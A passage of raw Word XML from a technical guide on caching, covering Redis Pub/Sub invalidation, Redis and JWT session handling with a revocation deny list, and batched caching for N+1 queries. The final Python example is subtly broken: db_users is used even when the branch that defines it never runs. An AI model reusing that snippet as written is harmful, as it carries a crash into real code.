        <w:t> TTL only. Cannot be purged externally. Design: short TTLs for mutable content, content-addressed URLs for immutable content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48631424" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Redis Pub/Sub for in-process cache invalidation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C088B63" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED8146F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t># When data changes, publish an invalidation event</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12949409" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>def update_product(product_id, new_data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FFC91A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    db.update('products', product_id, new_data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D2CE40" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    redis.delete(f'product:{product_id}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3F44FE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    redis.publish('cache_invalidation', json.dumps({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4692A5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        'type': 'product',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0174C3FF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        'id': product_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778FD172" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    }))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6362EB03" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="64DECD58" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># Each application server subscribes to invalidation events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5278A174" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>def on_invalidation_message(channel, message):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D6BBF9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    event = json.loads(message)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F641AE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    if event['type'] == 'product':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6242A4B9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        local_cache.invalidate(f'product:{event["id"]}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B6385B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="369CCB28" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># Subscribe on startup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382A9E0A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>redis.subscribe('cache_invalidation', on_invalidation_message)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FDBDAC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>This pattern allows all application servers' in-process caches to be invalidated within milliseconds of a DB write — without polling or short TTLs. The Redis Pub/Sub channel is the coordination mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026259BD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:pict w14:anchorId="0AD0CE87">
          <v:rect id="_x0000_i4794" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="12194A81" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Caching Patterns for Specific Problems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4BFC19" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Session Caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511335A1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>HTTP is stateless — session state must be stored and retrieved on each request. Without caching, every request hits a session database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FD46B7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The session storage problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578EC387" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF00536" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>Request arrives → extract session token from cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0504A311" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">               → look up session in store → O(1) distributed lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF06A5E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">               → validate session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2D4B8D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">               → proceed with request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B82AEE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Session stores require:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B53A39C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1363"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fast lookup:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Every HTTP request does a session lookup. At 100,000 RPS, that's 100,000 session reads per second.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B86585" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1363"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Expiry:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Sessions expire after inactivity. TTL-based eviction in Redis handles this automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571B94F4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1363"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consistency:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Session state must be consistent across all application servers — in-process caching alone is insufficient for multi-server deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582E3539" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Redis as session store:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBCAAB6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EE149D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># Store session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F996E53" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>redis.setex(f'session:{token}', 1800, json.dumps(session_data))  # 30-minute TTL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2A5533" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="1F134059" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># Retrieve session (on every request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4098605D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>session_json = redis.get(f'session:{token}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B594F2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>if session_json is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411FD47E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    return 401  # session expired or invalid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D27B1AC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>session = json.loads(session_json)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D813C2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="5A7AF87B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># Refresh TTL on activity (sliding window expiry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9B5C07" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>redis.expire(f'session:{token}', 1800)  # reset 30-minute timer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75264E1C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JWT as stateless sessions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598F72A5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>JWTs encode session data in the token itself — no server-side session store required. The token is cryptographically signed; the server verifies the signature without a DB/cache lookup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2E0220" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53146BD4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>No cache needed for validation — just cryptographic verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51797490" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Latency savings: 0.5–2ms per request (eliminated Redis round-trip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B799C44" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Trade-off: Cannot invalidate individual sessions (no server-side state to delete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436CC262" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">           Session data in token grows the token size (sent on every request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E69EFBC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">           Token refresh requires new token issuance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011ED9BD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The JWT revocation problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> If a JWT is stolen and you want to invalidate it before expiry, you have no server-side state to delete. Solutions: maintain a </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JWT deny list</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> in Redis (cache the list of invalidated JTIs — JWT IDs — with TTL matching their expiry). This reintroduces the cache lookup you were trying to eliminate but only for explicitly revoked tokens — the common path (valid, non-revoked tokens) remains cache-free.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1793E45B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database Query Result Caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAC2F7C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The N+1 query problem and caching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA65E69" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2880A060" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># N+1 without caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699543E0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>def get_order_details(order_ids):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E59C507" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    orders = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E854D6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    for order_id in order_ids:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100B97E5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        order = db.query("SELECT * FROM orders WHERE id = %s", order_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CEF34D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        user = db.query("SELECT * FROM users WHERE id = %s", order.user_id)  # N+1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495892E9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        orders.append({**order, 'user': user})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6608C87D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    return orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A004710" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># 1 query for orders + N queries for users = N+1 queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B320FA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="2E0513E1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># Batch query with caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D8585C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>def get_order_details(order_ids):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC28F0C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    orders = db.query("SELECT * FROM orders WHERE id IN %s", order_ids)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF6A017" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F687F61" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    user_ids = [o.user_id for o in orders]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EB6ABB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106A4E25" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    # Batch cache lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59449C7C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    cached_users = redis.mget([f'user:{uid}' for uid in user_ids])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38341FFB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BBBF58" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    missing_user_ids = [user_ids[i] for i, u in enumerate(cached_users) if u is None]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A860AC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519167D2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    if missing_user_ids:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5248CC1D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        db_users = db.query("SELECT * FROM users WHERE id IN %s", missing_user_ids)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCB52CB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        for user in db_users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3422EC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">            redis.setex(f'user:{user.id}', 3600, json.dumps(user))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472C5DCC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C173F71" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    # Combine cached + DB-fetched users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E98DD7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    all_users = {uid: json.loads(u) for uid, u in zip(user_ids, cached_users) if u}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F36F5D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    all_users.update({u.id: u for u in db_users})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A03F8D0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556CF59D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    return [{**order, 'user': all_users[order.user_id]} for order in orders]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50176EC3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
